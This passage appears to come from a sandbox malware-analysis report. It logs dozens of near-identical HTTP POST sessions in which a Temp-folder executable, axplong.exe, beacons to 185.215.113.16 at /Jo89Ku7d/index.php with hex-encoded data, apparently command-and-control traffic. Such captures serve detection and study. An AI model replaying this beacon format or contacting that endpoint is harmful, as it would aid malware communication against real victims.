                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:37.995116949 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:37 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        31192.168.2.652352185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:38.113203049 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:38.813474894 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:38 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:38.869442940 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:39.098179102 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:38 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        32192.168.2.652353185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:39.207828045 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:39.924778938 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:39 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:39.926194906 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:40.160979986 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:40 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        33192.168.2.652354185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:40.269043922 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:40.970058918 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:40 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:40.970940113 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:41.278166056 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:41.546993017 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:41 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        34192.168.2.652355185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:41.804069996 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:42.497658014 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:42 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:42.498722076 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:42.722876072 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:42 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        35192.168.2.652356185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:42.831140041 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:43.535562038 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:43 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:43.536477089 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:43.766567945 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:43 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        36192.168.2.652357185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:43.879252911 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:44.609877110 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:44 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:44.610804081 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:44.842838049 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:44 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        37192.168.2.652359185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:44.958792925 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:45.657520056 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:45 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:45.658691883 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:45.883124113 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:45 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        38192.168.2.652360185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:46.003679037 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:46.717406034 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:46 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:46.718281984 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:46.948828936 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:46 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        39192.168.2.652361185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:48.062160969 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:48.782737017 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:48 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:48.784013033 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:49.012455940 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:48 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        40192.168.2.652362185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:49.128546953 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:49.829962969 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:49 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:49.830853939 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:50.055825949 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:49 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        41192.168.2.652363185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:50.176501989 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:50.910456896 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:50 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:50.911456108 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:51.144068956 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:51 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
